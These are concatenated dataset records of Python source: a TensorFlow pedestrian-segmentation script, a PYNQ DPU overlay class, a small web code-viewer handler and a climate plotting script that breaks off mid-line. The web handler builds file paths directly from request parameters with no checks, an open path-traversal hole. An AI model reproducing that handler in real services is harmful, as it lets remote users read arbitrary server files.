backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_part_3,filter_sizes = self.w.shape,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d_backprop_input(input_sizes = [batch_size] + list(grad_part_3.shape[1:]),filter= self.w,out_backprop = grad_middle,\n strides=[1,stride,stride,1],padding=padding\n )\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass CNN_Trans():\n \n def __init__(self,k,inc,out,act=tf_elu,d_act=d_tf_elu):\n self.w = tf.Variable(tf.random_normal([k,k,inc,out],stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def getw(self): return self.w\n\n def feedforward(self,input,stride=1,padding='SAME'):\n self.input = input\n output_shape2 = self.input.shape[2].value * stride\n self.layer = tf.nn.conv2d_transpose(\n input,self.w,output_shape=[batch_size,output_shape2,output_shape2,self.w.shape[2].value],\n strides=[1,stride,stride,1],padding=padding) \n self.layerA = self.act(self.layer)\n return self.layerA \n\n def backprop(self,gradient,stride=1,padding='SAME'):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n\n grad = tf.nn.conv2d_backprop_filter(input = grad_middle,\n filter_sizes = self.w.shape,out_backprop = grad_part_3,\n strides=[1,stride,stride,1],padding=padding\n )\n\n grad_pass = tf.nn.conv2d(\n input=grad_middle,filter = self.w,strides=[1,stride,stride,1],padding=padding\n )\n \n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass FNN():\n \n def __init__(self,input_dim,hidden_dim,act,d_act):\n self.w = tf.Variable(tf.random_normal([input_dim,hidden_dim], stddev=0.05,seed=2,dtype=tf.float64))\n self.m,self.v_prev = tf.Variable(tf.zeros_like(self.w)),tf.Variable(tf.zeros_like(self.w))\n self.v_hat_prev = tf.Variable(tf.zeros_like(self.w))\n self.act,self.d_act = act,d_act\n\n def feedforward(self,input=None):\n self.input = input\n self.layer = tf.matmul(input,self.w)\n self.layerA = self.act(self.layer)\n return self.layerA\n\n def backprop(self,gradient=None):\n grad_part_1 = gradient \n grad_part_2 = self.d_act(self.layer) \n grad_part_3 = self.input\n\n grad_middle = grad_part_1 * grad_part_2\n grad = tf.matmul(tf.transpose(grad_part_3),grad_middle)\n grad_pass = tf.matmul(tf.multiply(grad_part_1,grad_part_2),tf.transpose(self.w))\n\n update_w = []\n update_w.append(tf.assign( self.m,self.m*beta1 + (1-beta1) * (grad) ))\n update_w.append(tf.assign( self.v_prev,self.v_prev*beta2 + (1-beta2) * (grad ** 2) ))\n m_hat = self.m / (1-beta1)\n v_hat = self.v_prev / (1-beta2)\n adam_middel = learning_rate/(tf.sqrt(v_hat) + adam_e)\n update_w.append(tf.assign(self.w,tf.subtract(self.w,tf.multiply(adam_middel,m_hat) ))) \n\n return grad_pass,update_w \n\nclass ICA_Layer():\n\n def __init__(self,inc):\n self.w_ica = tf.Variable(tf.random_normal([inc,inc],stddev=0.05,seed=2)) \n # self.w_ica = tf.Variable(tf.eye(inc)*0.0001) \n\n def feedforward(self,input):\n self.input = input\n self.ica_est = tf.matmul(input,self.w_ica)\n self.ica_est_act = tf_atan(self.ica_est)\n return self.ica_est_act\n\n def backprop(self):\n grad_part_2 = d_tf_atan(self.ica_est)\n grad_part_3 = self.input\n\n grad_pass = tf.matmul(grad_part_2,tf.transpose(self.w_ica))\n g_tf = tf.linalg.inv(tf.transpose(self.w_ica)) - (2/batch_size) * tf.matmul(tf.transpose(self.input),self.ica_est_act)\n\n update_w = []\n update_w.append(tf.assign(self.w_ica,self.w_ica+0.2*g_tf))\n\n return grad_pass,update_w \n\nclass Sparse_Filter_Layer():\n \n def __init__(self,outc,changec):\n self.w = tf.Variable(tf.truncated_normal([outc,changec],stddev=0.5,seed=2,dtype=tf.float64))\n self.epsilon = 1e-10\n\n def getw(self): return self.w\n\n def soft_abs(self,value):\n return tf.sqrt(value ** 2 + self.epsilon)\n\n def feedforward(self,input):\n self.sparse_layer = tf.matmul(input,self.w)\n second = tf.nn.elu(self.sparse_layer)\n # second = self.soft_abs(self.sparse_layer )\n third = tf.divide(second,tf.sqrt(tf.reduce_sum(second**2,axis=0)+self.epsilon))\n four = tf.divide(third,tf.sqrt(tf.reduce_sum(third**2,axis=1)[:,tf.newaxis] +self.epsilon))\n self.cost_update = tf.reduce_mean(four)\n return self.sparse_layer ,self.cost_update\n\n# ================= LAYER CLASSES =================\n\n# data\nPathDicom = \"../../Dataset/PennFudanPed/PNGImages/\"\nimage_list = [] # create an empty list\nfor dirName, subdirList, fileList in os.walk(PathDicom):\n for filename in fileList:\n if \".png\" in filename.lower() : # check whether the file's DICOM \\PedMasks\n image_list.append(os.path.join(dirName,filename))\n\nmask_list = [] # create an empty list\nPathDicom = \"../../Dataset/PennFudanPed/PedMasks/\"\nfor dirName, subdirList, fileList in os.walk(PathDicom):\n for filename in fileList:\n if \".png\" in filename.lower() : # check whether the file's DICOM \\PedMasks\n mask_list.append(os.path.join(dirName,filename))\n\nimage_resize_px = 96 \ntrain_images = np.zeros(shape=(170,image_resize_px,image_resize_px,3))\ntrain_labels = np.zeros(shape=(170,image_resize_px,image_resize_px,1))\n\nfor file_index in range(len(image_list)):\n train_images[file_index,:,:] = imresize(imread(image_list[file_index],mode='RGB'),(image_resize_px,image_resize_px))\n train_labels[file_index,:,:] = np.expand_dims(imresize(rgb2gray(imread(mask_list[file_index],mode='RGB')),(image_resize_px,image_resize_px)),3) \n\n\ntrain_labels = (train_labels>25.0) * 255.0\ntrain_images = train_images/255.0\ntrain_labels = train_labels/255.0\n\ntrain_batch = train_images[:84]\ntrain_label = train_labels[:84]\ntest_batch = train_images[84:]\ntest_label = train_labels[84:]\n\n# print out the data shape\nprint(train_batch.shape)\nprint(train_batch.max())\nprint(train_batch.min())\nprint(train_label.shape)\nprint(train_label.max())\nprint(train_label.min())\n\nprint(test_batch.shape)\nprint(test_batch.max())\nprint(test_batch.min())\nprint(test_label.shape)\nprint(test_label.max())\nprint(test_label.min())\n\n# f, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n# for xx in range(len(train_images)):\n# ax1.imshow(train_images[xx])\n# ax2.imshow(np.squeeze(train_labels[xx]))\n# plt.pause(0.5)\n# plt.cla()\n\n# class\nel1 = CNN(3,3,4)\nel2 = CNN(3,4,8)\nel3 = CNN(3,8,16)\nel4 = CNN(3,16,32)\n\nreduce_dim = 4\n# sparse_layer = Sparse_Filter_Layer(6*6*32,1*1*reduce_dim)\nfully_0 = FNN(6*6*32,reduce_dim,act=tf_elu,d_act=d_tf_elu)\n\ndl0 = CNN_Trans(3,4,1)\ndl1 = CNN_Trans(3,4,4)\nfl1 = CNN(3,4,4)\n\ndl2 = CNN_Trans(3,4,20)\nfl2 = CNN(3,4,4)\n\ndl3 = CNN_Trans(3,4,12)\nfl3 = CNN(3,4,4)\n\ndl4 = CNN_Trans(3,4,8)\nfl4 = CNN(3,4,1,act=tf_sigmoid)\n\n# hyper\nnum_epoch = 1201\nlearning_rate = 0.0005\nbatch_size = 1\nprint_size = 100\n\n# graph\nx = tf.placeholder(shape=[batch_size,image_resize_px,image_resize_px,3],dtype=tf.float64)\ny = tf.placeholder(shape=[batch_size,image_resize_px,image_resize_px,1],dtype=tf.float64)\n\nelayer1 = el1.feedforward(x)\n\nelayer2_input = tf.nn.max_pool(elayer1,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nelayer2 = el2.feedforward(elayer2_input)\n\nelayer3_input = tf.nn.avg_pool(elayer2,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nelayer3 = el3.feedforward(elayer3_input)\n\nelayer4_input = tf.nn.max_pool(elayer3,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nelayer4 = el4.feedforward(elayer4_input)\n\nsparse_input = tf.nn.avg_pool(elayer4,strides=[1,2,2,1],ksize=[1,2,2,1],padding='VALID')\nsparse_layer_input = tf.reshape(sparse_input,[batch_size,-1])\nfully_connected_layer = fully_0.feedforward(sparse_layer_input)\n\ndlayer0_input = tf.reshape(fully_connected_layer,[batch_size,2,2,1])\ndlayer0_input = tf.image.resize_images(dlayer0_input, [6, 6],method=tf.image.ResizeMethod.BILINEAR,align_corners=False)\ndlayer0_input2 = tf.cast(dlayer0_input,dtype=tf.float64)\ndlayer0 = dl0.feedforward(dlayer0_input2,stride=1) # 3 3\n\ndlayer01 = tf.image.resize_images(dlayer0, [12, 12],method=tf.image.ResizeMethod.BICUBIC,align_corners=False)\ndlayer01 = tf.cast(dlayer01,dtype=tf.float64)\ndlayer1 = dl1.feedforward(dlayer01) # 6 6\nflayer1 = fl1.feedforward(dlayer1)\n\nflayer11 = tf.image.resize_images(flayer1, [24, 24],method=tf.image.ResizeMethod.BILINEAR,align_corners=False)\nflayer11 = tf.cast(flayer11,dtype=tf.float64)\n\ndlayer2 = dl2.feedforward(tf.concat([flayer11,elayer3],3),stride=1) # 8 8\nflayer2 = fl2.feedforward(dlayer2)\n\nflayer21 = tf.image.resize_images(flayer2, [48, 48],method=tf.image.ResizeMethod.BILINEAR,align_corners=False)\nflayer21 = tf.cast(flayer21,dtype=tf.float64)\n\ndlayer3 = dl3.feedforward(tf.concat([flayer21,elayer2],3))\nflayer3 = fl3.feedforward(dlayer3)\n\nflayer31 = tf.image.resize_images(flayer3, [96, 96],method=tf.image.ResizeMethod.BICUBIC,align_corners=False)\nflayer31 = tf.cast(flayer31,dtype=tf.float64)\n\ndlayer4 = dl4.feedforward(tf.concat([flayer31,elayer1],3),stride=1)\nflayer5 = fl4.feedforward(dlayer4)\n\ncost0 = tf.reduce_mean(tf.square(flayer5-y))\n\ntotal_cost = cost0 \nauto_train = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(total_cost)\n\n# sess\nwith tf.Session() as sess:\n\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n\n train_cota,train_acca = 0,0\n train_cot,train_acc = [],[]\n \n test_cota,test_acca = 0,0\n test_cot,test_acc = [],[]\n\n # start the training\n for iter in range(num_epoch):\n\n train_batch,train_label = shuffle(train_batch,train_label)\n test_batch,test_label = shuffle(test_batch,test_label)\n\n # train for batch\n for batch_size_index in range(0,len(train_batch),batch_size):\n current_batch = train_batch[batch_size_index:batch_size_index+batch_size]\n current_batch_label = train_label[batch_size_index:batch_size_index+batch_size]\n sess_result = sess.run([total_cost,auto_train],feed_dict={x:current_batch,y:current_batch_label})\n print(\"Current Iter : \",iter ,' Current cost: ', sess_result[0],end='\\r')\n train_cota = train_cota + sess_result[0]\n\n # if it is print size print the cost and Sample Image\n if iter % print_size==0:\n print(\"\\n--------------\") \n print('Current Iter: ',iter,' Accumulated Train cost : ', train_cota/(len(train_batch)/(batch_size)),end='\\n')\n print(\"--------------\")\n\n # get one image from train batch and show results\n sess_results = sess.run(flayer5,feed_dict={x:train_batch[:batch_size]})\n test_change_image = train_batch[0,:,:,:]\n test_change_gt = train_label[0,:,:,:]\n test_change_predict = sess_results[0,:,:,:]\n\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n plt.suptitle('Original Image (left) Generated Image (right) Iter: ' + str(iter),fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(test_change_gt),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(test_change_gt*np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(test_change_image),cmap='gray')\n\n plt.savefig('train_change/'+str(iter)+\"_train_results.png\",bbox_inches='tight')\n plt.close('all')\n\n # get one image from test batch and show results\n sess_results = sess.run(flayer5,feed_dict={x:test_batch[:batch_size]})\n test_change_image = test_batch[:batch_size][0,:,:,:]\n test_change_gt = test_label[0,:,:,:]\n test_change_predict = sess_results[0,:,:,:]\n\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n plt.suptitle('Original Image (left) Generated Image (right) Iter: ' + str(iter),fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(test_change_gt),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(test_change_gt*np.squeeze(test_change_image),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(test_change_image),cmap='gray')\n\n plt.savefig('test_change/'+str(iter)+\"_test_results.png\",bbox_inches='tight')\n plt.close('all')\n\n train_cot.append(train_cota/(len(train_batch)/(batch_size)))\n train_cota,train_acca = 0,0\n\n # Normalize the cost of the training\n train_cot = (train_cot-min(train_cot) ) / (max(train_cot)-min(train_cot))\n\n # plot the training and testing graph\n plt.figure()\n plt.plot(range(len(train_cot)),train_cot,color='green',label='cost ovt')\n plt.legend()\n plt.title(\"Train Average Accuracy / Cost Over Time\")\n plt.savefig(\"viz/Case Train.png\")\n plt.close('all')\n\n # final all train images\n for batch_size_index in range(0,len(train_batch),batch_size):\n current_batch = train_batch[batch_size_index:batch_size_index+batch_size] \n current_batch_label = train_label[batch_size_index:batch_size_index+batch_size]\n sess_results = sess.run(flayer5,feed_dict={x:current_batch})\n for xx in range(len(sess_results)):\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n\n # test_change_predict = (sess_results[xx]-sess_results[xx].min())/(sess_results[xx].max()-sess_results[xx].min())\n test_change_predict = sess_results[xx]\n\n plt.suptitle('Final Train Images : ' + str(xx) ,fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(current_batch_label[xx]),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(current_batch_label[xx]*np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(current_batch[xx]),cmap='gray')\n\n plt.savefig('final_train/'+str(batch_size_index)+\"_\"+str(xx)+\"_train_results.png\",bbox_inches='tight')\n plt.close('all')\n\n\n for batch_size_index in range(0,len(test_batch),batch_size):\n current_batch = test_batch[batch_size_index:batch_size_index+batch_size] \n current_batch_label = test_label[batch_size_index:batch_size_index+batch_size]\n sess_results = sess.run(flayer5,feed_dict={x:current_batch})\n for xx in range(len(sess_results)):\n f, axarr = plt.subplots(2, 3,figsize=(27,18))\n \n # test_change_predict = (sess_results[xx]-sess_results[xx].min())/(sess_results[xx].max()-sess_results[xx].min())\n test_change_predict = sess_results[xx]\n\n plt.suptitle('Final Test Images : ' + str(xx) ,fontsize=20)\n axarr[0, 0].axis('off')\n axarr[0, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[0, 1].axis('off')\n axarr[0, 1].imshow(np.squeeze(current_batch_label[xx]),cmap='gray')\n\n axarr[0, 2].axis('off')\n axarr[0, 2].imshow(np.squeeze(test_change_predict),cmap='gray')\n\n axarr[1, 0].axis('off')\n axarr[1, 0].imshow(np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 1].axis('off')\n axarr[1, 1].imshow(current_batch_label[xx]*np.squeeze(current_batch[xx]),cmap='gray')\n\n axarr[1, 2].axis('off')\n axarr[1, 2].imshow(test_change_predict*np.squeeze(current_batch[xx]),cmap='gray')\n\n plt.savefig('final_test/'+str(batch_size_index)+\"_\"+str(xx)+\"_test_results.png\",bbox_inches='tight')\n plt.close('all')\n\n\n# -- end code --","sub_path":"NeuralNetwork/Sparse_Auto/z_z_archieve/y_backup_compare.py","file_name":"y_backup_compare.py","file_ext":"py","file_size_in_byte":22753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373218062","text":"# Copyright (C) 2021 Xilinx, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport sys\nif '/usr/lib/python3.6/site-packages' not in sys.path:\n sys.path.append('/usr/lib/python3.6/site-packages')\n\n\nimport os\nimport subprocess\nfrom ctypes import *\nfrom typing import List\nimport pynq\nimport vart\nimport xir\n\n\n__author__ = \"Yun Rock Qu, Jingwei Zhang\"\n__copyright__ = \"Copyright 2021, Xilinx\"\n__email__ = \"pynq_support@xilinx.com\"\n\n\nMODULE_PATH = os.path.dirname(os.path.realpath(__file__))\nOVERLAY_PATH = os.path.join(MODULE_PATH, 'overlays')\nXCL_DST_PATH = \"/usr/lib\"\n\n\ndef get_child_subgraph_dpu(graph: \"Graph\"):\n assert graph is not None, \\\n \"Input Graph object should not be None.\"\n root_subgraph = graph.get_root_subgraph()\n assert root_subgraph is not None, \\\n \"Failed to get root subgraph of input Graph object.\"\n if root_subgraph.is_leaf:\n return []\n child_subgraphs = root_subgraph.toposort_child_subgraph()\n assert child_subgraphs is not None and len(child_subgraphs) > 0\n return [cs\n for cs in child_subgraphs\n if cs.has_attr(\"device\") and cs.get_attr(\"device\").upper() == \"DPU\"]\n\n\nclass DpuOverlay(pynq.Overlay):\n \"\"\"DPU overlay class.\n\n This class inherits from the PYNQ overlay class. The initialization method\n is similar except that we have additional bit file search path.\n\n \"\"\"\n def __init__(self, bitfile_name, dtbo=None,\n download=True, ignore_version=False, device=None):\n \"\"\"Initialization method.\n\n Check PYNQ overlay class for more information on parameters.\n\n By default, the bit file will be searched in the following paths:\n (1) the `overlays` folder inside this module; (2) an absolute path;\n (3) the relative path of the current working directory.\n\n By default, this class will set the runtime to be `dnndk`.\n\n \"\"\"\n if os.path.isfile(bitfile_name):\n abs_bitfile_name = bitfile_name\n elif os.path.isfile(os.path.join(OVERLAY_PATH, bitfile_name)):\n abs_bitfile_name = os.path.join(OVERLAY_PATH, bitfile_name)\n else:\n raise FileNotFoundError('Cannot find {}.'.format(bitfile_name))\n super().__init__(abs_bitfile_name,\n dtbo=dtbo,\n download=download,\n ignore_version=ignore_version,\n device=device)\n self.overlay_dirname = os.path.dirname(self.bitfile_name)\n self.overlay_basename = os.path.basename(self.bitfile_name)\n self.runner = None\n self.graph = None\n\n def download(self):\n \"\"\"Download the overlay.\n\n This method overwrites the existing `download()` method defined in\n the overlay class. It will download the bitstream, set AXI data width,\n copy xclbin and ML model files.\n\n \"\"\"\n super().download()\n self.overlay_dirname = os.path.dirname(self.bitfile_name)\n self.overlay_basename = os.path.basename(self.bitfile_name)\n self.copy_xclbin()\n\n def copy_xclbin(self):\n \"\"\"Copy the xclbin file to a specific location.\n\n This method will copy the xclbin file into the destination directory to\n make sure DNNDK libraries can work without problems.\n\n The xclbin file, if not set explicitly, is required to be located\n in the same folder as the bitstream and hwh files.\n\n The destination folder by default is `/usr/lib`.\n\n \"\"\"\n abs_xclbin = self.overlay_dirname + \"/\" + \\\n self.overlay_basename.rstrip(\".bit\") + \".xclbin\"\n if not os.path.isfile(abs_xclbin):\n raise ValueError(\n \"File {} does not exist.\".format(abs_xclbin))\n\n if not os.path.isdir(XCL_DST_PATH):\n raise ValueError(\n \"Folder {} does not exist.\".format(XCL_DST_PATH))\n _ = subprocess.check_output([\"cp\", \"-f\",\n abs_xclbin, XCL_DST_PATH])\n\n def load_model(self, model):\n \"\"\"Load DPU models for both DNNDK runtime and VART.\n\n For DNNDK, this method will compile the ML model `*.elf` binary file,\n compile it into `*.so` file located in the destination directory\n on the target. This will make sure DNNDK libraries can work\n without problems.\n\n The ML model file, if not set explicitly, is required to be located\n in the same folder as the bitstream and hwh files.\n\n The destination folder by default is `/usr/lib`.\n\n Currently only `*.elf` files are supported as models. The reason is\n that `*.so` usually have to be recompiled targeting a specific\n rootfs.\n\n For VART, this method will automatically generate the `meta.json` file\n in the same folder as the model file.\n\n Parameters\n ----------\n model : str\n The name of the ML model binary. Can be absolute or relative path.\n\n \"\"\"\n if os.path.isfile(model):\n abs_model = model\n elif os.path.isfile(self.overlay_dirname + \"/\" + model):\n abs_model = self.overlay_dirname + \"/\" + model\n else:\n raise ValueError(\n \"File {} does not exist.\".format(model))\n if not os.path.isdir(XCL_DST_PATH):\n raise ValueError(\n \"Folder {} does not exist.\".format(XCL_DST_PATH))\n\n if not model.endswith(\".xmodel\"):\n raise RuntimeError(\"Currently only xmodel files can be loaded.\")\n else:\n self.graph = xir.Graph.deserialize(abs_model)\n subgraphs = get_child_subgraph_dpu(self.graph)\n assert len(subgraphs) == 1\n self.runner = vart.Runner.create_runner(subgraphs[0], \"run\")\n","sub_path":"pynq_dpu/dpu.py","file_name":"dpu.py","file_ext":"py","file_size_in_byte":6282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"616950455","text":"import re\nfrom subprocess import Popen, PIPE\n \nprjRoot = \"/home/beonit/work/\"\n\n# http://localhost/codeview/index.py/get_file?prj=android-platform&filename=system/core/Android.mk&linnum=1\ndef get_file(req):\n info = req.form\n prj = info.get('prj', None)\n if prj is None:\n return \"errno 0 : prj is none\"\n filename = info.get('filename', None)\n if filename is None:\n return \"errno 1\"\n linnum = info.get('linnum', '0')\n fileHandle = file( prjRoot + prj + \"/\" + filename )\n out = \"\"\n for line in fileHandle:\n out += line\n return out\n\n# http://localhost/codeview/index.py/get_file_list?prj=android-platform&path=frameworks/base/core\ndef get_file_list(req):\n import os\n info = req.form\n prj = info.get( 'prj', None )\n if prj is None:\n return \"errno 0 : prj is none\"\n path = info.get( 'path', None )\n if path is None:\n return \"errno 1 : path is noen\"\n out = \"\"\n os.chdir( prjRoot + prj + \"/\" + path )\n f = os.popen(\"find -type f -maxdepth 1\")\n out = \"\"\n for line in f.readlines():\n out += line[2:]\n return out\n\n# http://localhost/codeview/index.py/get_dir_list?prj=android-platform&path=frameworks/base/core\ndef get_dir_list(req):\n import os\n info = req.form\n prj = info.get( 'prj', None )\n if prj is None:\n return \"errno 0 : prj is none\"\n path = info.get( 'path', None )\n if path is None:\n return \"errno 1 : path is noen\"\n out = \"\"\n os.chdir( prjRoot + prj + \"/\" + path )\n f = os.popen(\"ls -d */\")\n out = \"\"\n for line in f.readlines():\n out += line[:-2] + \"\\n\"\n return out\n\n# http://localhost/codeview/index.py/cscope?prj=android-platform&method=-1&query=shutdown\ndef cscope(req):\n import os\n info = req.form\n prj = info.get( 'prj', None )\n if prj is None:\n return \"errno 0 : prj is none\"\n method = info.get( 'method', None )\n if method is None:\n return \"errno 1 : method is empty\"\n query = info.get( 'query', None )\n if query is None:\n return \"errno 2 : query is empty\"\n\n dbfile = prjRoot + prj + \"/cscope.out\"\n proc = Popen([\"cscope\", \"-dL\", \"-f\", dbfile, method, query],\n stdin=PIPE,\n stdout=PIPE,\n cwd=prjRoot+prj)\n out = \"\"\n for line in proc.stdout.readlines():\n out += line\n return out\n","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"91001444","text":"import cmaps as cmps\r\nimport numpy as np\r\nimport xarray as xr\r\nimport matplotlib.pyplot as plt\r\nimport cartopy.crs as ccrs\r\nimport cartopy.feature as cfeat\r\n\r\nfrom cartopy.util import add_cyclic_point\r\nfrom shapely.geometry.polygon import Polygon\r\nfrom sklearn.feature_selection import f_regression\r\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\r\n\r\nimport sys\r\nsys.path.append(\"../utils/\")\r\n\r\nfrom mon2season import Month_to_Season\r\nfrom lonFlip import lonFlip_EW, lonFlip_360\r\nfrom tibet_shp_load import tibet_shp_load\r\nfrom tnflux import tnflux\r\nfrom draw_polar_steoro import draw_north_polar_steoro\r\nfrom Linear_Regression_dim import Linear_Regression_dim\r\n\r\nmylev = 200\r\n\r\nsic_idx = np.loadtxt(\"../sic-idx/idx-filter.txt\")\r\n#sic_idx = np.loadtxt(\"../test/myidx.txt\")\r\n\r\ndsz = xr.open_dataset('../data/hgt.mon.mean.nc')\r\ndsu = xr.open_dataset('../data/uwnd.mon.mean.nc')\r\ndsv = xr.open_dataset('../data/vwnd.mon.mean.nc')\r\ndst = xr.open_dataset('../data/air.mon.mean.nc')\r\n\r\nyear_start = 1979\r\nyear_end = 2020\r\nyear = range(year_start, year_end)\r\n\r\ndsz = lonFlip_EW(dsz)\r\ndsu = lonFlip_EW(dsu)\r\ndsv = lonFlip_EW(dsv)\r\n\r\nhgt = dsz['hgt'].loc[:,200,:0,:]\r\nlat = dsz['lat'].loc[:0]\r\nlon = dsz['lon']\r\n\r\nuwnd = dsu['uwnd'].loc[:,200,:0,:]\r\nvwnd = dsv['vwnd'].loc[:,200,:0,:]\r\n\r\nuwnd_son = Month_to_Season(uwnd, \"SON\", \"ave\", year_start, year_end)\r\nvwnd_son = Month_to_Season(vwnd, \"SON\", \"ave\", year_start, year_end)\r\n\r\nu_c = uwnd_son.mean(dim=\"time\")\r\nv_c = vwnd_son.mean(dim=\"time\")\r\n\r\nfor myseason in [\"SON\",\"OND\",\"NDJ\"]:\r\n\tss = lonFlip_EW(xr.open_dataset(\"CP-%s.nc\" % myseason))\r\n\tck = ss['__xarray_dataarray_variable__']\r\n\r\n\r\n\thgt_son = Month_to_Season(hgt, myseason, \"ave\", year_start, year_end)\r\n\tuwnd_son = Month_to_Season(uwnd, myseason, \"ave\", year_start, year_end)\r\n\tvwnd_son = Month_to_Season(vwnd, myseason, \"ave\", year_start, year_end)\r\n\t\r\n\thgt_reg, reg_sig = Linear_Regression_dim(hgt_son, sic_idx, 0)\r\n\thgt_reg_xr = xr.DataArray(hgt_reg,coords=[(\"lat\",lat.values),(\"lon\",lon.values)])\r\n\treg_sig_xr = xr.DataArray(reg_sig,coords=[(\"lat\",lat.values),(\"lon\",lon.values)])\r\n\t\r\n\tFx, Fy = tnflux(u_c, v_c, hgt_reg_xr, mylev, lat, lon, 0.01)\r\n\t\r\n\tFx.loc[11:,:] = np.nan\r\n\tFy.loc[11:,:] = np.nan\r\n\t\r\n\ttibet_shp = tibet_shp_load(\"../utils/tibet_shape\")\r\n\t\r\n\t# plot var\r\n\t\r\n\tplt.close\r\n\t\r\n\tck, lon1 = add_cyclic_point(ck, coord=lon)\r\n\t\r\n\tFx, lonFx = add_cyclic_point(Fx, coord=lon)\r\n\tFy, lonFy = add_cyclic_point(Fy, coord=lon)\r\n\t\r\n\tfig, ax = draw_north_polar_steoro(10)\r\n\t\r\n\tlevels = np.linspace(-5,5,21)\r\n\t\r\n\tim = ax.contourf(lon1, lat, ck, levels=levels, cmap=cmps.BlueWhiteOrangeRed, transform=ccrs.PlateCarree(), extend=\"both\")\r\n\t\r\n\tcb = plt.colorbar(im, orientation='horizontal', ticks=levels[::2], shrink=0.8)\r\n\tcb.ax.tick_params(labelsize=18)\r\n\t\t\r\n\tpgon = Polygon(tibet_shp)\r\n\tax.add_geometries([pgon], crs=ccrs.PlateCarree(), facecolor=\"none\", edgecolor='black', linewidth=1.0)\r\n\t\r\n\t# plot wave activity flux\r\n\tfontproperties = {\"size\":14}\r\n\twaf = ax.quiver(lonFx[::2], lat[::2], Fx[::2,::2], Fy[::2,::2], transform=ccrs.PlateCarree(), pivot='mid', width=0.0018, scale=2.0, headwidth=4)\r\n\twaf_key = ax.quiverkey(waf, 0.85, -0.13, 0.20, \"0.20\", color=\"black\", fontproperties=fontproperties)\r\n\t\r\n\tfig.show()\r\n\tfig.savefig(\"waf-cp-%s.png\" % myseason, 